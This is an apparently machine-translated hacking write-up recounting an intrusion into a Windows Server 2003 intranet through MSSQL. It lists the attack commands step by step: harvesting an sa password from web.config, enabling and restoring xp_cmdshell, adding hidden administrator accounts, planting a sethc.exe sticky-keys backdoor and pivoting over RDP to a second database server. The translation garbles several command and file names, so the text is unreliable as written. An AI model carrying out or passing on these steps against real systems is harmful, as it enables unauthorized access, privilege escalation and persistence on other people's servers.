Case study of MSSQL intrusion Elevation of Privilege-Intranet penetration

Figure text: udb311 topic: MSSQL Intranet penetration case analysis published: Black and White Front Line Description: it has always been mysterious to the Intranet penetration technology, and a webshell is an intranet server. I would like to take this opportunity to practice the Intranet intrusion penetration technology! Sensitive information in this article is blocked! All passwords are replaced by the "*" sign. This process mainly applies to xp_mongoshell recovery and execution.

Image and text: udb311
Topic: MSSQL Intranet penetration Case Study
Post: Black and White Front Line

Description: it has always been mysterious about the Intranet penetration technology. A webshell is an intranet server. I would like to take this opportunity to practice the Intranet intrusion penetration technology! Sensitive information in this article is blocked! All passwords are replaced by the "*" sign. This process mainly applies to xp_mongoshell recovery and execution, and then uses it with your own flexible thinking.

Environment: 2003 SERVER
Supported by IIS: 6.0Php
Databases: MSSQL and MYSQL
Website type: ASPX

This article focuses on the Intranet penetration elevation, which is not described for webshells. Anyone who knows about intrusion penetration knows that after obtaining the webshell, the server must first find the vulnerability where the Elevation of Privilege is located. From the perspective of this site, MSSQL and MYSQL support ASPX andPHPIt can be said that the permission is large enough. First, let's take a look at what the Directory provides. Check the program directory first. Is it common. There is no information such as SU and MYSQL.

 

E: the disk can be viewed.
F: the disk can be viewed.

The ASPX type website on this site uses the MSSQL database. The user who shows that the password is not the highest permission, that is, a DB user cannot obtain the permission immediately.

Go over other sites and find the directories one by one. A directory named web. config has a SA user.

Database connection information:

Source = gzzx; Initial Catalog = SMSCenter; Persist Security Info = True; User ID = sa; Password = *** "enable aspxspy and use the database connection function.

The logon is successful, and the SA seems to have no permission downgrade.

The connection status is MSSQL 2005. Start xp_cmdshell first.

Next, executeCommand"WhoAmi"

"Good" and "system" permissions. The following describes how to add an account ..
Exec master. dbo. xp_mongoshell 'net user admin ***/Dd'

Exec master. dbo. xp_mongoshell 'net localgroup adminisTrAtors admin/add'

Check if port 3389 is enabled.
Exec master. dbo. xp_mongoshell 'netStat-Ano'

OK. The status is normal.
Exec master. dbo. xp_mongoshell 'ipconfig/all': the configuration is an intranet IP address.

The IP address resolved by the domain name can be connected to 3389.
It indicates that the management has implemented port ing, so do not forward the port. Saving a lot of effort!

In this way, the permissions of a server are obtained. From the SQL connection of the website, it is not difficult to find that there are SQL servers in the intranet.

Penetration continues ......

The Intranet IP address is 200, which is also the mssql sa permission.

Use the aspxspy database to connect,

Depressing things happen and cannot be connected.
[DBNETLIB] [ConnectionOpen (Connect ().] SQL Server does not exist or access is denied.

In principle, when the database can be used, it should be able to successfully connect to the database. Isn't the TCP/IP configured to access the database? The question arises. If you are impatient, try it on the server through 3389. MSSQL is installed on the server, including the query analyzer and Enterprise Manager. This has become our tool. Haha!
The SQL analyzer cannot be connected.

First, test the existence of the MSSQL Server machine.

A successful response indicates that the server exists.
Run mstsc and try to connect to MySQL 3389. an xp interface is displayed. Relatively depressing.

Try name resolution service...
Click Browse to see which of the following MSSQL Server names is actually unknown. We can see that the 200 and IP200 machines are similar. Enter the SA and password.

Return to the query window. Try xp_cmdshell

No found, recovered
Use master dbcc addExTendEdProc ('xp _ javasshell', 'xp log70. dll ')
OK!

Run the command"Whoami", Although XP does not support whoami commands.

Exec xp_cmdshell 'net user 123 123/add'

A system error is prompted. No permission to add .... Not exactly...

Thought: 3389 availableSetReplace hc.exe...

Exec xp_cmdshell 'Copy c: windwosexplorer.exe c: windowssystem32sethc.exe 'replace it?
The problem arises again, prompting that the disk file is insufficient.
Use xp_dirTreeView Drive C
Exec master .. XP_dirtree 'C: ', 1, 1

List file directories and delete backups of a Database
Execute exec xp_cmdshell 'Copy c: windwosexplorer.exe c: windowssystem32sethc.exe'

Indicates that a file has been copied. 3389 shift does not pop up five times.

Try again
Exec xp_cmdshell 'net user 123 123/add' indicates that the operation is successful. It was originally a system error caused by insufficient space. Really like opening it!
Exec xp_cmdshell 'net localgroup administrator 123/add'

3389 log on ..
Exec xp_cmdshell 'net user 123/del' delete a user

There are still many machines in the Intranet, so this penetration is over...

Conclusion: the internal network forwards data from the port to external connections, and then logs on from 3389 to the internal network. The internal 3389 technology is similar to the stepping stone technology.